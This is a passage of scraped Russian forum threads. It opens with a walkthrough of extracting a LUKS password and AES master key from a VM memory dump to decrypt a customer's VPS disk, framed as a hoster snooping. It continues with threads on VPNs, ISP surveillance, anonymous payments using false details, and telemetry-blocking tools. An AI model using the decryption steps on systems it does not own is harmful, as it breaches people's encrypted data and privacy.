При помощи FTK Imager далее производим в дампах поиск паролей:

Что лично меня удивило, это то, насколько легко доступном виде в ОЗУ пароль хранится, взят в кавычки и с пометкой от чего пароль)) в дампе он встречается несколько раз, первый раз в неразборчивом виде без контекста, видимо это были нажатия клавиатуры, дальше уже все понятно

Пароль рута конечно же тоже удалось в дампе обнаружить, ему особо внимания не удаляю:

Теперь давайте представим ситуацию, что у хостера не было дампа ОЗУ при создании LUKS, но ему очень интересно посмотреть VPS.
Дождался установки Ubuntu, перезагрузился и вижу окно LUKS, 1 раз специально ввожу неправильный пароль, и следом правильный, интересно посмотреть как это будет отображаться в дампе ОЗУ:

Делаю пару дампов:

Code:Copy to clipboard

VBoxManage debugvm "ubuntu" dumpvmcore --filename "C:\Users\admin\Desktop\Forensics\Ubuntu\LUKS_boot_1.elf"
VBoxManage debugvm "ubuntu" dumpvmcore --filename "C:\Users\admin\Desktop\Forensics\Ubuntu\LUKS_boot_2.elf"

Пару - просто на всякий случай, как показала практика, не в каждом дампе можно найти пароль, в отличии от ключа.

Итого поиск пароля в ОЗУ на скринах ниже, в некоторых местах фейковый пароль от настоящего идут подрят. В целом можно выделить какую-то сигнатуру для их поиска в ОЗУ.

Как и сказал ранее, не всегда получается в ОЗУ найти пароль LUKS, поэтому отдельно покажу как я извлекал ключ из ОЗУ, воспользовался для этого утилитой findaes-1.2 (https://sourceforge.net/projects/findaes/files/), она отлично ищет ключи в ОЗУ:

Ключ LUKS имеет размер 512 бит, что соответственно 2 по 256 )) тут нужно теперь взять эти значения, которые нашел findaes, оставить только те, которые встречаются 1 раз, без повторений и пробовать их комбинировать.

К примеру (упрощенный пример) имеем следующие 3 значения:

123
345
567

из них у нас получится 6 ключей (123345, 345123, 345567, 567345, 123567, 567123), т.е. нужно пробовать их соединять разными сторонами))
и да, нужно удалить пробелы, чтоб получить что-то около того:

Code:Copy to clipboard

dd8ea32cb3b1ee904cc19abf4604626032cbf96a2089ab80f0c922f50df1d90cc7e23cd38d61e17b60fc2bd143c51382f328a32acae527685db32024c6f1afa3

Теперь нужно привести этот ключ (dd8ea32cb3b1ee904cc19abf4604626032cbf96a2089ab80f0c922f50df1d90cc7e23cd38d61e17b60fc2bd143c51382f328a32acae527685db32024c6f1afa3), и соответственно другие тоже в бинарный формать, т.к. сейчас он находиться в шестнадцатеричном формате, делается это очень просто командой:

Code:Copy to clipboard

xxd -r -p key1.txt key1.bin

это же проделываем со всеми ключами

Для того что бы расшифровать LUKS нам нужен сам виртуальный диск с файловой системой LUKS VM, на видео я это сделал прям с горячей системы, чтоб показать что не обязательно даже выключать или ставить на паузу VM, чтоб сделать копию виртуального диска, я делал это через FTK Imager, это криминалистический софт который очень многое позволяет сделать внутри системы, им же можно и файлы подкачки прям с запущенной системы копировать, и многое другое, поэтому сделать копию запущенного виртуального диска не составило проблемы.

Входной формат дисков может быть разный в зависимости от источника. Например, на Qemu/KVM — «Qcow2», в VirtualBox — VDI, в ESXi — VMDK. Это не создает никаких сложностей, потому что все эти форматы можно преобразовать в RAW формат, а RAW в абсолютно любой формат. Для криминалистики RAW, он же DD, — это идеальный формат. Если вы занимаетесь криминалистикой, старайтесь все образы, за исключением E01, преобразовывать в RAW, а не использовать их в исходном оригинальном формате. Исключение, конечно, если нативный софт и нативный формат.

Ниже несколько примеров, как преобразовать разные форматы дисков гипервизоров в RAW:

Code:Copy to clipboard

qemu-img convert -f vmdk -O raw /path/to/source.vmdk /path/to/destination.raw
qemu-img convert -f qcow2 -O raw /path/to/source.qcow2 /path/to/destination.raw
qemu-img convert -f vpc -O raw /path/to/source.vhd /path/to/destination.raw
qemu-img convert -f vhdx -O raw /path/to/source.vhdx /path/to/destination.raw

Для LVM (XEN):

Code:Copy to clipboard

sudo qemu-img convert -f raw /dev/vgname/lvname -O raw /path/to/destination.raw
sudo dd if=/dev/vgname/lvname of=/path/to/destination.raw bs=64K conv=noerror,sync

В моем случае я буду использовать VirtualBox. Представим, что входной формат диска у меня был нейтральный — RAW. RAW формат сразу я не могу подключить, поэтому у меня есть два варианта: создать файл дескриптор — VMDK либо преобразовать в формат, который без проблем воспримет VirtualBox.

Первый вариант через дескриптор:

Code:Copy to clipboard

VBoxManage internalcommands createrawvmdk -filename /path/to/your/disk.vmdk -rawdisk /path/to/your/disk.raw

Второй вариант: RAW to VDI

Code:Copy to clipboard

"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" convertdd C:\raw\disk.raw C:\vdi\disk.vdi --format VDI

LUKS можно расшифровать как самим паролем, так и ключем

Для того чтобы расшифровать ключом LUKS, нужно знать адрес устройства, его видно на скриншоте ниже

И теперь имея ключи и зная устройство пробуем расшифровать:

Code:Copy to clipboard

sudo cryptsetup --master-key-file key1.bin luksOpen /dev/sdb3 bHDD

На скрине ниже отлично видно что не каждый ключ подошел, и все же нужный ключ был найден))

Что мы и видим

Это не конец, следующим постом (ниже) будет текстовая версия Windows форензики

Поднятие своего VPN на виртуальном сервере для самых маленьких

ID: 676533bbb4103b69df371946
Thread ID: 116377
Created: 2024-06-08T10:03:42+0000
Last Post: 2024-07-24T09:33:18+0000
Author: centesis
Prefix: Мануал/Книга
Replies: 13 Views: 2K

Шаг 1: Для начала нам нужно определиться с хостингом, лично я использую сервис is*hosting и буду рассказывать на его примере. Мы переходим на сайт хостинга и регистрируемся, советую регистрироваться на устойчивую почту к которой вы всегда сможете получить доступ. Далее мы переходим во вкладку услуги и нас интересует "VPN серверы":

Далее мы нажимаем добавить услугу и выбираем тариф, лично я использую Amnezia VPN из за того, что в моей стране высокая цензура и большинство VPN блокируется провайдером. Оплачиваем тариф, обычно они стоят не более 7$ в месяц (самый базовый), после этого мы ждем пока наш сервер установится, прогресс можно увидеть здесь:

Когда будет написано "Запущен/Установлен/Отключен", тогда сервер будет готов к использованию.
Шаг 2
Далее мы устанавливаем сам VPN: Amnezia VPN, дальше мы должны интегрировать ключ доступа к серверу в сам VPN, его можно получить в паели управления сервером:

Нас итересует VPN Uri, мы копируем ключ и вставляем в сам Amnezia VPN и наш сервер подключается.
Шаг 3
В принципе наш VPN готов, далее вы можете сами установить дополнительные плюшки в ваш VPN сервер, все это делается в Amnezia VPN, там уже зависит от вашей фантазии)

Надеюсь я смог кому то помочь, если появятся проблемы с установкой, смело пишите сюда, я постараюсь всем помочь!

Click to expand...

Анонимность, безопасность RDP (как технически выглядит коннект к рдп?)

ID: 676533bbb4103b69df371951
Thread ID: 114199
Created: 2024-05-09T15:11:04+0000
Last Post: 2024-06-17T00:12:57+0000
Author: solomonfinik
Replies: 7 Views: 2K

Предположим нужно делать коннект к рдп и обмениваться с ним файлами через буфер обмена. Без впн прокси тд и тп.
Как технически выглядит такой коннект, именно если разбирать его буквально? Если с мобилы или с винды.
Я понимаю, что там пошифровано все должно быть винды 11/серва 2022, у андроида я думаю тоже самое. Все так говорят ))

Насколько коннект защищен в современных реалиях? Только узнают айпи сервака и если он в снг = отправят запрос хостеру и возможно попытаются отправить запрос провайдерам и проверить, кто из клиентов коннектился с этим айпи?
Но узнают ли что за файлы и что вообще происходит у клиента/сервера? (узнают ли = провайдер и тд)?

Какими данными о вас обладают операторы связи и провайдеры.

ID: 676533bbb4103b69df371952
Thread ID: 112913
Created: 2024-04-19T20:15:32+0000
Last Post: 2024-06-17T00:08:13+0000
Author: Asian Fetish
Prefix: Статья
Replies: 6 Views: 2K

Многие люди, часто тревожатся по поводу своей конфиденциальности и анонимности в интернете. Видит ли провайдер мои посещенные сайты? Можно ли как то понять, что за тобой следят? Хранит ли мобильный оператор мои отправленные сообщения? Каким видит провайдер мой трафик? В этой статье, мы постараемся максимально просто и не углубляясь в терминологию, ответить на эти и многие другие вопросы.

Слежка на законодательном уровне.
Начнем с того, что все провайдеры и операторы Российской Федерации обязаны анализировать трафик пользователей в соответствии с нормами российского законодательства. Это описано в Федеральном законе от 07.07.2003 N 126-ФЗ (ред. от 01.03.2020) "О связи", в статье 64. Так же, в пункте 1.1 и 1.2 прописано:
Операторы связи обязаны хранить на территории Российской Федерации
Информацию о фактах приема, передачи, доставки и (или) обработки голосовой информации, текстовых сообщений, изображений, звуков, видео- или иных сообщений пользователей услугами связи - в течение трех лет с момента окончания осуществления таких действий;
Текстовые сообщения пользователей услугами связи, голосовую информацию, изображения, звуки, видео-, иные сообщения пользователей услугами связи - до шести месяцев с момента окончания их приема, передачи, доставки и (или) обработки. Порядок, сроки и объем хранения указанной в настоящем подпункте информации устанавливаются Правительством Российской Федерации.
Это означает, что все действия пользователей операторов сохраняются в базе данных. На определенное время.
Провайдер, трафик естественно не хранит. Однако он выполняет его автоматическую обработку и классификацию. Результаты записываются в лог-файлы, для упрощенного, временного хранения.
В общем, провайдер видит лишь посещаемые вами сайты, в образе URL и IP- адресов. Здесь ни в коем случае не подразумевается целенаправленный шпионаж, а хранение данных за определённый период времени, что компании по оказанию услуг связи обязаны делать на законодательном уровне.

Мобильные операторы.
Записи разговоров у оператора:
Прослушивание разговоров осуществляется адресно. В настоящий момент не существует системы тотальной записи всех разговоров в федеральном масштабе. В прошлом это было невозможно технически, в последнее время технических препятствий становится все меньше, но еще далеко не вся аппаратура готова к такому, особенно в регионах.

СМС у оператора:
Существует требование, в соответствии с которым, SMS (как и метаданные о разговорах) должны храниться минимум три года. Но, поскольку хранение SMS технически не вызывает проблем, а юридически ограничен только минимальный срок хранения, то в реальности SMS хранятся практически вечно.

Данные:
Операторы обязаны все данные также отправлять на СОРМ(система оперативно- розыскных мероприятий) - внутренний ID абонента у оператора (привязан к договору со всеми персональными данными), номер телефона, IMSI симки, IMEI аппарата, CI - идентификатор соты, в которой находится абонент.

Местоположение:
Регистрируются местоположение в моменты: вход/выход из сети, перемещение из одной соты в другую и по ручному запросу в любой момент. Самим операторам ничего не мешает отслеживать местоположение непрерывно с записью всего трека, это остается на усмотрение оператора, практика может варьироваться в зависимости от региона.
Запросы в поисковике и режим "Инкогнито".
Что вы конкретно пишите и ищите в поисковой строке — оператор не видит. Так как, многие значимые браузеры используют защитное HTTPS соединение. Но, операторы и провайдеры, как говорилось выше, могут видеть URL и IP посещаемых сайтов.
Скрыт ли трафик в режиме инкогнито? Думаю всем известно, что нет. Данный режим попросту не сохраняет историю и файлы «cookie». На этом его возможности заканчиваются. Провайдер в том же объеме будет видеть лог трафика, что и в обычном режиме.
Знает ли оператор, какой контент вы потребляете?
Операторы и провайдеры, не знают какие вы просматриваете видео или фото в интернете. Связанно это со статьёй номер 63 Федерального закона “О связи”. В пункте 2, сказано:
Операторы связи обязаны обеспечить соблюдение тайны связи.
Не думаю, что операторы будут нарушать законодательство страны.
Но они видят URL посещаемых сайтов. Например https://www.youtube.com/ или https://vk.com/. А так же и IP адреса посещенных сервисов.

Знает ли оператор, какой контент вы потребляете?
Операторы и провайдеры, не знают какие вы просматриваете видео или фото в интернете. Связанно это со статьёй номер 63 Федерального закона “О связи”. В пункте 2, сказано:
Операторы связи обязаны обеспечить соблюдение тайны связи.
Не думаю, что операторы будут нарушать законодательство страны.
Информация о скачиваемых файлах.
У интернет-провайдеров есть возможность посмотреть статистику по соединениям. Они могут отслеживать: объём переданных данных, IP-адреса источника и номера портов. Провайдер, так же может исследовать очень много данных: когда стартовало или завершилось скачивание, когда стартовала раздача, какое количество трафика было роздано.
В России пока что пиратство безопасно – все законы ограничивают возможности администрации трекеров и других распространителей пиратского контента, но не рядовых пользователей. Однако в некоторых европейских странах пользование торрентами чревато большими штрафами. Так что если едете за границу, не попадайтесь.
Браузер Tor и VPN.
Если вы используете VPN, то провайдер видит, что шифрованный трафик отправляется на определённый IP-адрес. Кроме того, он может узнать, что IP- адреса из этого диапазона продаются под VPN-сервисы. Некоторые VPN сотрудничают с операторами и в некоторых случаях, автоматически сливают трафик им.

Куда идёт трафик с VPN-сервиса, провайдер автоматически отследить не может. Но если сопоставить трафик абонента с трафиком любого сервера по временным меткам, то можно выполнить дальнейшее отслеживание. Просто для этого нужны более сложные и дорогие технические решения. От скуки никто такое точно разрабатывать и использовать не будет.
Когда вы подключаетесь через Tor, провайдер также видит зашифрованный трафик. И расшифровать, что вы делаете в интернете в данный момент, он не сможет.
В отличие от VPN, где трафик обычно направляется на один и тот же сервер в течение большого промежутка времени, Tor автоматически меняет IP-адреса. Соответственно, провайдер может определить, что вы, вероятно, пользовались Tor, по шифрованному трафику и частой смене адресов, а затем отразить это в логах. Но по закону вам за это тоже ничего не будет.

За использование VPN + Tor, вам ничего не будет. Так как по закону, данные манипуляции не запрещены.

Гаджет для взлома ЛЮБОГО СМАРТФОНА. Мобильный криминалист и UFED

ID: 676533bbb4103b69df371958
Thread ID: 115949
Created: 2024-06-03T06:36:01+0000
Last Post: 2024-06-06T05:37:36+0000
Author: alphadroid
Replies: 9 Views: 2K

00:00 Вступление
00:56 Силовики против приватности
02:15 Cellebrite UFED: главный взломщик телефонов
08:55 Как работает UFED
15:54 Черный рынок и дыры в безопасности
24:22 Взлом по беспределу
29:33 UFED в России. Обход санкций
37:12 Мобильный криминалист. Сага об импортозамещении
41:36 Разбираем реальные кейсы
45:26 Как себя защитить?

Связка VPN > Whonix GW > VPN

ID: 676533bbb4103b69df371959
Thread ID: 41654
Created: 2020-09-02T08:22:31+0000
Last Post: 2024-06-06T02:37:52+0000
Author: rokkkkkko
Replies: 14 Views: 2K

Решил сделать такую связку как в сабже, имеем:

Macbook на котором VirtualBox, в виртуалке стоит Whonix Gateway и Windows 7. В виртуалбоксе в настройках сети я указал для Windows 7 адаптер №2 "Внутренняя сеть Whonix".
В винде, в сетевых параметрах настроил ип, шлюзы и днс от Whonix, все работает, винда выходит в сеть с Тора который ей выдает Whonix. Теперь я хочу на винде завернуть весь трафик в ВПН, так как многие сайты ругаются на Тор трафик. Но появилась проблема, я установил Nord VPN и при его включении, винда работает "без сети", ничего не грузится. Я так понимаю что каким-то образом конфликтуют "Подключение локальной сети" которое я настраивал для Whonix и подключение NordLynx, которое автоматически создал NordVpn. Второй день ковыряюсь и не могу настроить что бы сеть нормально работала.

Подскажите пожалуйста, как лучше завернуть конечный трафик на виртуальной винде в ВПН и в какой лучше. Спасибо!

Анонимные платежи

ID: 676533bbb4103b69df37195a
Thread ID: 48680
Created: 2021-02-26T19:08:19+0000
Last Post: 2024-06-04T18:56:32+0000
Author: Neils
Replies: 11 Views: 2K

Как осуществлять быстрые анонимные платежи? Например, купить 1 прокси сервер за 30 рублей.
Под анонимностью имею в виду возможность отправить деньги, не спалив, например, свой IP или реальный номер телефона.
Крипта, имеет свои недостаки, например, требует времени для подтверждения транзакции, а так же, если говорить, например, о биткоине, ...вшая комиссия.
За перевод 2-3$ просит 9$ комиссии (и то, это минимально рекомендуемая).
А так как комиссия обратно пропорциональна времени подтвердждения транзакции, то есть "хочешь быстрее - плати больше", то крипта - не лучший вариант.
Было бы хорошо использовать Qiwi, заходить в кошелек только с тора, оформить на левые данные. Но проблема с телефоном.
Зарегистировать киви без номера нельзя, а так как реальный номер я не использую, единственный вариант, арендовывать номер у сервисов на долгое время, это и деньги платить, и вдруг че если пропадет номер - пропадут и деньги на кошельке.
Как еще можно проводить платежи, чтобы для регистрации аккаунта не требовался номер телефона?

Линукс не анонимен (телеметрия в дистрибутивах линукс)

ID: 676533bbb4103b69df37195b
Thread ID: 111095
Created: 2024-03-22T19:52:39+0000
Last Post: 2024-06-03T15:07:09+0000
Author: mvm23
Replies: 18 Views: 2K

В этом посте хочу рассказать про телеметрию в дистрибутивах линукс, так как я мало видел чего то подобного на этом форуме.

Откуда в Linux телеметрия вообще? Многим кто использует линукс это может показаться странным но телеметрия была в нем всегда, например когда мы вводим команду apt-get на сервера отпровляется информация о по которое установленно
на вашем пк. Но конкретно этом нет ничего криминального, если посмотреть то персональные данные и ввод оно не собирает. Дебиан и его родственники кстати собирают информацию по установленным пакетам, об этом предупреждают в
установщике и это можно отключить.

Gnome Info Collect - средство сбора телеметрии в окруженнии gnome
Это в своё время подняло очень много хейта и обсуждений в сторону разрабочиков гном и canonical. Получается так, что любой дистрибутив использующий окружение gnome будет содержать эту утилиту.
Какие данные оно собирает:
Дистрибутив
Версия дистрибутива
Информация об оборудовании
Установлен ли Flatpak
Подключен ли Flathub
Установленные приложения
Избранные приложения (закрепленные в доке)
Типы онлайн аккаунтов GNOME
Статус настроек DAV, VNC, RDP, SSH и некоторые другие
Используются ли виртуальные рабочие столы на всех мониторах или только на главном
Динамический или статические Workspaces
Количество пользователей в системе
Браузер, используемый по умолчанию
Активные расширения GNOME

Что с этим делать? Не стоить сразу бежать и удалять рабочие окружение гном, так как утилита работает самостоятельно и не особо зависит от других компонентов гнома. Но её все еще можно просто удалить вручную. Пример на opensuse -
sudo zypper remove gnome-info-collect

Заключение:
Телеметрия в линуксе есть и была с самого его основание, но она не так страшна как в macos или windows и все же это лучше знать че не знать.
Рано или поздно линукс скорее всего обрастет кучей другого "шпионского по". Все тенденции видут именно к этому. Обрадуюсь если это не окажется правдой.

Голосовое общение (VoIP, etc), анонимность

ID: 676533bbb4103b69df37195c
Thread ID: 34464
Created: 2020-01-19T19:51:31+0000
Last Post: 2024-06-01T17:41:34+0000
Author: PlebsoVata
Replies: 6 Views: 2K

Что можете посоветовать для анонимного голосового общения именно в реальном времени аля скайп\дискорд.
Будет ли достаточным иметь сервер с шифрованием без логгирования в тимспике или нет?

Прятки с Windows 10. Тестируем программы для отключения слежки и повышения приватности

ID: 676533bbb4103b69df37195d
Thread ID: 26620
Created: 2018-11-23T15:20:10+0000
Last Post: 2024-06-01T14:50:26+0000
Author: lukas
Replies: 2 Views: 2K

Прятки с Windows 10. Тестируем программы для отключения слежки и повышения приватности

С выхода Windows 10 прошло уже три с лишним года, а проблема слива пользовательских данных на серверы Microsoft так и не решена. Более того, она усугубилась принудительным сбросом настроек приватности и перезапуском отключенной службы обновлений. В этой статье мы сравним несколько утилит для управления «шпионскими» компонентами ОС и посмотрим, насколько они эффективны на современных сборках Windows 10.
В Microsoft никогда не скрывали, что собирают сведения о пользователях, просто раньше ограничивались витиеватыми фразами об отправке «некоторых сведений в целях улучшения пользовательского опыта». После вступления в силу Европейского регламента по защите данных и ряда других законов юристам компании пришлось раскрыть подробности. Вот здесьможно почитать о том, какие данные собираются, куда передаются, как обрабатываются и в каких случаях раскрываются.

Перед потребителями в Microsoft выкрутились тем, что якобы дают возможность самостоятельно настроить тип и количество передаваемых данных. Для этого необходимо установить [пакет обновлений](https://www.microsoft.com/en- us/software-download/windows10) (для тех, у кого билд ниже 15063.0) и воспользоваться экраном конфиденциальности. Желательно сделать это еще на этапе установки.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F1.png&hash=ce8a7c20b0a8200ff60eb364a8939715)
Экран конфиденциальности при установке Windows 10

Методика тестирования
Все тесты проводились параллельно на двух тестовых сборках Windows 10 Pro — 1709 и 1803. Чтобы условия тестирования были идентичны, каждая «антишпионская» программа была развернута в клонах виртуалки. На скриншотах в статье сначала приводится снимок работы в 1709, а затем в 1803, если не указано иное. В качестве вспомогательных утилит использовались Wireshark 2.6.3 64 bit, TCPView v. 3.05 и Regshot v. 2.1.0.17.
Во всех тестируемых программах выбирались настройки блокировки по максимуму. Если какую-то функцию или приложение не заблокировать, то возникнет неопределенная погрешность. Будет непонятно: то ли это незаблокированный пункт приводит к сливу данных, то ли какую-то функцию программе не удалось отключить. Идеальный результат — это дамп сетевого трафика без IP-адресов Microsoft. Посмотрим, кто как справится с этой задачей, но для начала проверим штатные функции управления приватностью в Windows.

Проверка настроек приватности
Если оставить настройки по умолчанию, то после загрузки ОС сразу виден большой поток исходящего трафика на адреса Microsoft.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F3.png&hash=def2e60de72d022d5bc8eb0eb7da4356)
Мониторинг сетевого трафика с дефолтными настройками приватности

Теперь отключаем все, что отключается на экране приватности. Результат налицо.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F4.png&hash=669a2d3dd2ee1d6d504f600c626bd97e)
Мониторинг сетевого трафика с обрезанной передачей телеметрии

отключение записи активности пользователя;
отключение отправки данных о вводе с клавиатуры;
отключение отправки образцов рукописного ввода;
отключение сбора диагностических данных (телеметрии);
отключение сбора данных о местоположении;
отключение и сброс персональных настроек Cortana;
отключение доступа в интернет для Windows Media DRM;
отключение доступа приложений к информации об учетной записи, календарю, сообщениям, камере, микрофону и местоположению;
(опционально) отключение службы обновления Windows для других продуктов.

Изменяют ключи реестра, отвечающие за настройки приватности.
Добавляют в файл %WINDIR%\System32\drivers\etc\hosts известные авторам программы URL сетевых узлов, на которые Microsoft сливает данные.
Добавляют в брандмауэр Windows наборы запрещающих правил, блокирующие подключение к известным IP-адресам Microsoft.
Останавливают «следящие» службы.
Удаляют «шпионские» задания планировщика.
В хардкорном варианте удаляют системные файлы и каталоги, отвечающие за «шпионские» функции.

Попытка добиться максимальной приватности с помощью подобных программ может привести к тому, что перестанут работать и нужные компоненты, слетит активация Windows, ОС будет вести себя нестабильно или вообще не загружаться. Настоятельно рекомендуем не ограничиваться встроенными в них средствами резервного копирования, а использовать сторонние программы для создания полного образа диска. С ним гарантированно останется возможность вернуть систему в исходное состояние, что бы с ней ни случилось в ходе экспериментов.

Blackbird 1.0.28
https://www.getblackbird.net
Программа работает в консольном режиме. У нее изначально всего три функции:

сканировать систему и вывести все (по мнению разработчика) обнаруженные проблемы;
запустить менеджер блокировки;
сделать бэкап настроек. Вот эту функцию хочу особо отметить. Не каждая программа позволяет это сделать, так что, если что-то пошло не так, просто восстанавливаем настройки до блокировки и работаем дальше. Бэкап помещается в папку с программой, и, когда он сделан, программа меняет одну из своих функций с «Бэкапировать» на «Восстановить из бэкапа».

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F7.png&hash=07333aad535e4307c8d494f38f0fe539)
Интерфейс Blackbird

После сканирования выдается очень большой список «недочетов», которые надо исправить.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F8.png&hash=edc5e46fe2cce37788980e16aa1498ea)
Сканирование в Blackbird

Пунктов в нем и вправду много, но есть очень спорные моменты. К примеру, первым делом резанул глаз пункт блокировки службы W32Time. Если комп будет в домене, то как синхронизировать время с сервером?
Перейдем к списку блокировки. Нажимаем А на главном экране программы и видим такую картинку.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F9.png&hash=50d07d1792db8ba1c921817094511341)
Список приложений и служб для блокировки Blackbird

Обрати внимание, что в билде 1803 добавлены несколько новых функций, поэтому блокировке подлежит 78 пунктов, а не 70, как в 1709. Вот наглядный пример, почему для теста я выбрал два релиза Windows 10.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F10.png&hash=c89329a760c4bd70907e85af86e6b0d9)
Разница в билдах Windows 10 в Blackbird

В списке компонентов, которые может отключить Blackbird, нет службы Windows Update. Само отключение сделано неудобно: нет готовых профилей настроек, каждый пункт приходится выбирать отдельно.
После выполненных действий в сборке 1709 удалось отключить все «следящие» функции, программа справилась на ура. На сборке 1803 одна функция так и не была отключена, причем их общее количество почему-то стало 79.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F11.png&hash=b676637e3ceb63fe05c80ae80d3fb79b)
Blackbird не полностью справилась со сборкой 1803

С блокировкой следящих функций Blackbird в целом справилась, но обе тестовые сборки из-за нее пришли в нерабочее состояние. Меню «Пуск» не открывается. Edge и IE не запускаются. Магазин приложений и почта пытаются запуститься, но сразу закрываются. В панели уведомлений висят сообщения, которые нельзя открыть. В общем, жить с настолько изуродованной операционкой невозможно. Хоть обновления установились без проблем!
При восстановлении из созданного Blackbird бэкапа лучше не стало. В сборке 1709 слетела активация Windows и появились две ошибки реестра. После перезагрузки ни одна проблема так и не была устранена. Сборка 1803 вообще не смогла запустить Blackbird для восстановления из бэкапа, начав ругаться на ошибку файловой системы (хотя с ФС все было в порядке).
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F12.jpg&hash=c2f791700f858f0f62681f8ce84ffcc4)
Ошибки при восстановлении бэкапа

Вывод очевиден. Blackbird место в нашей бывшей рубрике «Западлостроение».

Destroy Windows 10 Spying 1.0.1.0
https://github.com/Nummer/Destroy-Windows-10-Spying
Destroy Windows 10 Spying — программка, которая, скорее всего, уже на слуху у каждого, кто задавался вопросом, как отключить передачу своих данных в Microsoft. Поговаривают, что после версии 1.0.1.0 сменился разработчик и в новые релизы начали вшивать троян. Поэтому воспользуемся последней официальной версией, которую выпустил Nummer.
Версия 1.0.1.0 написана в апреле 2018 года. На моих сборках она запустилась и определила их правильно. Помимо прочего, в программе есть функция отключения обновлений Windows, которой я заодно и воспользовался.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F13.png&hash=82d79cdb75455899363091cecc11c105)
Destroy Windows 10 Spying 1.0.1.0

Исходящий трафик по «левым» адресам стал меньше, но по-прежнему наблюдалось активное общение с ненужными нам IP-адресами. Версия программы устарела, и в новых сборках Windows свою функцию она толком не выполняет. Однако утилита и не калечит операционку, как это делает Blackbird. Мои виртуальные компьютеры после DWS выжили. В течение трех дней никаких программных неполадок выявлено не было. Сразу после перезагрузки сборка 1709 зависала пару раз, но обошлось малой кровью, и все восстановилось.
С блокировкой Windows Update программа DWS тоже сработала криво. После четырех-пяти перезапусков Windows в логах TCPView снова засветился svhost, который как ни в чем не бывало продолжил доставлять обновления. Еще я обратил внимание на очень тесный диалог сборки 1709 с IP-адресом сервера в сети Akamai Technologies, сотрудничающей с Microsoft, и сильное увеличение пакетов SSDP. Возможно, винда сама перебирала запасные способы отправить данные, когда собственные серверы оказались частично недоступны.

DoNotSpy10 4.0
https://pxc-coding.com/donotspy10
Еще одна популярная программа с удобным интерфейсом. Для каждого пункта разработчик сделал небольшое описание, поэтому разобраться в ней просто — расставляй галочки, и вперед!
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F15.jpg&hash=96fcd84c212d5190d4377c806e91aba8)
Интерфейс DoNotSpy10

O &O ShutUp10 1.6.1399
https://www.oo-software.com/en/shutup10
Эта программка немецких разработчиков O&O Software имеет удобный интерфейс и несколько профилей настроек. Можно применить только рекомендуемые или все сразу в один клик. Также среди плюсов отмечу импорт и экспорт параметров реестра. Как показала практика, это очень важный момент. Машинный перевод на русский режет глаз, но его достаточно для понимания подсказок, которые всплывают при нажатии на строку отключения функции.
В окне программы сделана колонка с названием «Рекомендовано?», а в ней пункты с пометкой «НЕТ». Сначала кажется, что это какие-то особо опасные твики, но среди них перечислены и автообновления.
Сразу хочу отметить одну важную деталь: в сборке 1709 программа предлагает изменить 97 пунктов, а в 1803 — уже 100. Добавленные три пункта находятся в разделе «Конфиденциальность приложений» и запрещают доступ к документам, изображениям и видео.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F24.png&hash=e05c6232d6baf06237678d3d00a95bcb)
Различие O&O ShutUp10 на разных сборках Windows 10

При выборе первой же «следящей» функции программа выдала предупреждение о том, что в системе отключена функция создания точек восстановления. Еще один плюс в карму!
Как и во всех предыдущих тестах, я выбрал настройки «ультра», чтобы по максимуму использовать возможности программы. Сразу перед закрытием O&O ShutUp10 предупредила, что если на комп накатятся (а по мнению разработчиков, они все равно накатятся) обновления, то придется запускать программу заново и возвращать настройки. Почему бы тогда полностью не заблокировать их установку?
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F18.png&hash=80403845d5e023dae0cf573d46eaccbb)
Второе немецкое предупреждение

Еще одно небольшое наблюдение (это придирка, но перфекционист внутри меня негодует): после предупреждения программа предлагает перезагрузиться, но не может выполнить перезагрузку ни в сборке 1709, ни в сборке 1803. Обе пришлось ребутить вручную.
Сразу после следующей загрузки ОС и до запуска Wireshark TCPView показал неприятную картину. Опять процессы общаются с адресами MS!
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F19.png&hash=60eeaf00978c8a8a6c4ab4d679d6f241)
Запрет сработал только частично

Дамп Wireshark тоже не порадовал. Явно видна установка сессии и передача данных, хотя пакетов отправляется и не так много.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F21.png&hash=8ba24438db60cdda069709a3692ba307)
Дамп трафика Windows 10 1803

Как и ожидалось, svhost подкачивает обновления, хотя я отключил их в O&O ShutUp10, указав два связанных с Windows Update пункта.
Через пять-восемь часов пропал доступ к интернету. Вернуть его удалось перезагрузкой сетевого адаптера, но следующая проверка наличия обновлений в Windows закончилась неудачей.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F22.jpg&hash=673b26dfa1d9ce3d332270796fea2c13)
Ошибка обновлений

Спустя сутки изменились два параметра: были отключены «Запретить выполнение приложений в фоновом режиме» и «Отключение телеметрии (3 из 3)». На 1709 подобного не наблюдалось.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F23.png&hash=1324f5b578b207fef97b6328735b22a9)
O&O ShutUp10

